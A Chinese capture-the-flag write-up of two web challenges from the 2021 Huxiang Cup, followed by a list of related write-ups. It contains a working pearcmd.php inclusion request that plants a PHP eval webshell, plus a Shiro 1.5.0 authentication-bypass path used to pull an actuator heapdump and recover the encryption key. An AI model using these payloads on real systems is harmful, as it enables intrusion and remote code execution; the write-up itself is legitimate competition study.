前言

总的来说的话，题目质量还是不错的，另外那道XSS也是0解，也幸好自己是一点XSS都不会（寒假补一波），卷是真的卷。还有很多的东西自己对其的认识都只停留在表面吧，还是得慢慢学习。除了shiro的鉴权绕过是自己之前专门学过的，所以打开pom.xml看到1.5.0的版本立马就知道这题得有个鉴权绕过，别的，剩下的打shiro一开始没打通才换了工具打（后来才发现我一直在拿cc的链子打，我说怎么打不通。。。）。还是慢慢学习了。

easywill

打开页面发现是个WillPHP，而且应该就是assign的模板渲染了，而且根据这个东西和tp有点关联，联想到tp的那个assign实现的文件包含。去下载源码跟一下，发现是在这里出现了任意文件包含

 public static function renderTo($viewfile, $vars = []) {$m = strtolower(__MODULE__);$cfile = 'view-'.$m.'_'.basename($viewfile).'.php';if (basename($viewfile) == 'jump.html') {$cfile = 'view-jump.html.php';}$cfile = PATH_VIEWC.'/'.$cfile;if (APP_DEBUG || !file_exists($cfile) || filemtime($cfile) < filemtime($viewfile)) {echo "123";$strs = self::compile(file_get_contents($viewfile), $vars);var_dump($cfile);file_put_contents($cfile, $strs);}extract($vars);include $cfile;

但是找不到flag，发现pearcmd.php包含可以利用，直接打就可以了：

GET /?name=cfile&value=/usr/local/lib/php/pearcmd.php&+-c+/tmp/.feng.php+-d+man_dir=<?eval($_POST[0]);?>+-s+ HTTP/1.1

就把马写在了/tmp/.feng.php，再包含之即可：

Pentest in Autumn

pom.xml里面有个shiro 1.5.0。

打开网站发现没什么东西，扫了一下（bushi）扫到了actuator，但是很明显需要shiro得鉴权绕过：

/;/actuator/env

找到了这篇文章：https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html

利用heapdump找到shiro的key来实现反序列化攻击。通过访问/;/actuator/heapdump下载下来，然后找key。

但是文章里的那个工具我本地用不了。。。我用了jdk自带的：

D:\environment\jdk8u302-b08\bin>jhat.exe C:\Users\15997\Desktop\heapdump
Reading from C:\Users\15997\Desktop\heapdump...
Dump file created Sun Nov 14 14:39:57 CST 2021
Snapshot read, resolving...
Resolving 286122 objects...
Chasing references, expect 57 dots.........................................................
Eliminating duplicate references.........................................................
Snapshot resolved.
Started HTTP server on port 7000
Server is ready.

经过一番寻找找到了key：

转换一下：

import base64
s= "0xa1, 0x58, 0xba, 0xdd, 0xa3, 0x90, 0xf8, 0x09, 0x2b, 0x92, 0x5e, 0xe4, 0x04, 0x8a, 0x42, 0x34"
print(s.replace(", ","").replace("0x",r"\x"))ss=b'\xa1\x58\xba\xdd\xa3\x90\xf8\x09\x2b\x92\x5e\xe4\x04\x8a\x42\x34'
print(base64.b64encode(ss))
#b'oVi63aOQ+Akrkl7kBIpCNA=='

然后工具直接梭：

2021-湖湘杯-Web相关推荐

2021湖湘杯 Hideit Writeup
2021湖湘杯 Hideit AAA : immortal 动态调试直接x64dbg动调找到了关键的加密代码分别是xxtea 和 chacha20,直接动调从中拿出各种参数然后写代码进行解密.其实一 ...
2018湖湘杯web、misc记录
1.题目名 Code Check 打开题目,右键发现有id参数的url,简单base64解码以后发现不是明文,说明利用了其他的加密方式,那么应该会有具体的加密方式给我们,于是试试常见的文件泄露,可以发 ...
[HXBCTF 2021]湖湘杯easywill
INDEX 0x00 前言啥是Pear? pear installl pear config-create 关于pearcmd.php 和 register_argc_argv register_a ...
2021湖湘杯wp_web
easywill will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2 该框架参考了thinkphp,开头首页给出了a ...
2018湖湘杯海选复赛Writeup
2018湖湘杯Writeup 0x01 签到题 0x02 MISC Flow 0x03 WEB Code Check 0x04 WEB Readflag 0x05 WEB XmeO 0x06 Reve ...
2020湖湘杯 wp
2020湖湘杯 wp web 题目名字不重要反正题挺简单的 NewWebsite misc misc2(题目名忘了.....) 总结昨天打了下湖湘杯,签到选手上线. web 题目名字不重要反正题挺简 ...
2020湖湘杯部分writeup
周末打了湖湘杯,把做题过程记录一下,大家交流学习. 下面的链接里有题目,可以下来看看. https://download.csdn.net/download/jameswhite2417/130819 ...
湖湘杯2021-pwn-final部分复现
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打 ...
slax9Linux中文,湖湘杯-WriteUp | CN-SEC 中文网
Web 题目名字不重要反正题挺简单的解题思路非预期,DASFLAG变量在phpinfo里显示出来了 NewWebsite 解题思路 http://47.111.104.169:56200/?r=c ...
湖湘杯2019两个密码题wp
湖湘杯2019两个密码题wp 还是自己太菜的原因,这次湖湘杯只做出来4道题,然后5点的时候就放弃了去跟同学出去玩了,当时感觉进前50无望(这次湖湘杯py情况也很严重啊,可惜烽火台只报不封,挺恶心的 ...

2021-湖湘杯-Web

前言

easywill

Pentest in Autumn

2021-湖湘杯-Web相关推荐

最新文章

热门文章